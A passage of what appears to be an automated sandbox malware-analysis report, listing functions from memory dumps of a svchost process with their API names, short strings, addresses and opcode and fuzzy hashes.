                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                                Function 00000257E10A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 168117317CCF4186FB5FAB65BC4B39926D0BB89782F44C4A5DA0447396FB3AC4458728
                                                                                Function 00000257E10A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 1ca0844d76c3e8bd01ab4792baa35eba0e52544e90a3a5dfd8280d08fd67e20c
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: CB31F63139AF00E1EE1BDB02BC0BB5523D4B748BA2F5905659E2F4B792DF38C0458328
                                                                                Function 00000257E10B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 9ee7c4574fcb2fd013fb964aa6248de50fe65bdbb00ad364504beb63cc9ade48
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 3111BF31358F4086E756CB12FC4BB1972A4F388FE6F180265EA2A87794CF38C8148748
                                                                                Function 00000257E10A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 9a2b3325603176c98f4169559021404f9569204c8e58316270e8b4dcf71a70dc
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 60118B36348F4086EF199B22F80E76A62B4FB88B86F040468DE990B794EF3DC545C718
                                                                                Function 00000257E10A5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 966c8cfc9cd363fdfda02b2bdcc18e9b8abbeec9a729aea55c5a0fc7a420839d
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: E6D1C976248F88C1DA75DB0AF89A35A77A0F388B85F104252EACD47BA9DF3CC551CB14
                                                                                Function 00000257E10A2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: cdb653347486f95d6936b3a6e080e65dbc29c48c69199ff8dba1e233120f6aa2
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: CF31D232389F5186EA1ACF16FD4BB69A7A4FB44B86F084170AE4847B55EF34C4A18314
                                                                                Function 00000257E10ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: bbc7888f5e4037d8188519172c2121bad00389fe15c94999cae900f3cde1423e
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: A4114D703C8F8081FA6E97317E4F76D21516B487E2F1447A4B936466E6DE78C4018728
                                                                                Function 00000257E10A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 4c54e0cd68b01bb03e9099f5d5445d1d048295c9e60c374dc5866ed19de68462
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 48015731348F4082EA19DB52B89AB5A63A5F788FC2F888475DE5A43754DE38C989C704
                                                                                Function 00000257E10A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: f5791e389f93502f4c9fee8c8b73c305a7e67720a75c226d159784ea1be0102c
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 47011775259F4086EB2ADB22FC1F71A66B0BB99B87F0404A4DA5907764EF3DC148CB18
                                                                                Function 00000257E10A9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: dfda00a6953bd7fd31afee440e3a8cdc3f116b40ca32194e381a607924f2b4fb
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 4C51A132749B008AEB1EDB25FC4FB593796F344B89F1081A8DA1747788EB75E981C718
                                                                                Function 00000257E10A8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 7996f0918551bbe49c81effb0a51052158cdeed2e265b154e812129fb940380b
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 7A317832388B409AE71ADB21FC4BB5937A5F340B8AF158158AE5747789DB39D980C718
                                                                                Function 00000257E10A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d56e8e4ea1c63715ed7fae816492958a322087c5f1097162d2259ce4f6dc8c21
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: C2F06272348F4192EB65CF21FCDAB5A67A1F758BCAF848060DA4946954DF3CC68DCB04
                                                                                Function 00000257E10ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: a1c3fc9fb2c424eb5cf16538e388777059fc8f0e0a0ae8e1d12dd053b8120eaf
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: D9F06271359F0481EB1ACB29FC4FB6A6321FB88BA2F540299DA6A461E4DF3CC4448354
                                                                                Function 00000257E10A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 6788c6199675c10edf7c539ab1b1bd7f0a961ca82cbb9ee56a1611471c4650f0
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: E1F08C2038DF8482EA49CF13BD1F619A260AB48FC2F0880B0EE6A07B18DF3CC4458708
                                                                                Function 00000257E10A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 3bab7aea2da97d2c89cf869e435822f7947a441c0eb5686131a233f6f073e29f
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: 8702F67225DB8086EBA5CB59F89635AB7A0F3C4785F104055EA8E87BA8DF7CC484CF14
                                                                                Function 00000257E10A5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: 7c0b0c8c25f7da43d0dd52c625788ab6d70cb4887c3805681c3f7a601031dd5b
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: E261C77655DF40C6E76A8B1AF84A31AB7E0F388785F100155EA8E47BA8DB7CC444CF18
                                                                                Function 00000257E1083504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a39f79cb811ea4c1becf5d789feaa45f4274d3385c809976c6f2e92f2461cad1
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: B911A7226DCF1119FA5E1529FC4F3693180EBD9376F4846B8A9660EFDACA78C8414228
                                                                                Function 00000257E10B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 9bd224d7f8937e48dcb23c6a92691f7b715b7476c5eb2bebaeb9097fbf750117
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 3011A722FDCF5021F66E9568FC5FB6911406B783B6F180EA4A577876D6CA34CB41811C
                                                                                Function 00000257E107F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 8e9c97b707987eaf443330098e57a4151393cd7d99a53dd1af56ba60a02a01f1
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 7561D63268CF4042F66FFB69FD4F3B966A1F782742F514495DA2A07795DB34C8428308
                                                                                Function 00000257E10AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 84adbe2866ac1e2fb66f4364389380746c042a873a352a778f6fc0d74beb4a81
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: E961BD33608F88CAEB29DF65E88639D77A0F358B89F044255EF4A17B99DB38C084C714
                                                                                Function 00000257E107A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 83f5e9c311c848ec4fd2a0c7c7ec5783ac5279642614553dd1b91d6c427617f7
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 0E51D432148B80CAEB7AAF25B84B37877A0F354B86F1C8155FA8947BD5CB78D491C708
                                                                                Function 00000257E10AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: ff1a59e2cae9877e41fdea86006ac35bc3c2ac676c8524eb9a1b3888c61eb4ec
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 6351E172188B80CAEB7D8F65B88B35D77A4F354B86F148156DB8A47BD5CB38C490C718
                                                                                Function 00000257E1078405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                                Function 00000257E10783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                                Function 00000257E10B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 68dab6fe74a75fbd6536b3dcbd820ba112786e56dfb684d69ab30bb7c3da5d7e
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 69D13032B58F8089E716CFB9E84A79C3BB1F354B99F008256CE5997B99DB38D406C344
                                                                                Function 00000257E10A14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 1db1360ba7b751730b1259011854ce9dc25cb220d1e3979c32bb2201401d3ca7
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 16015A32648F90C6E709DF66FD0A64A77A4F788F82F084825EA5A43729DE38C451C744
                                                                                Function 00000257E10B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
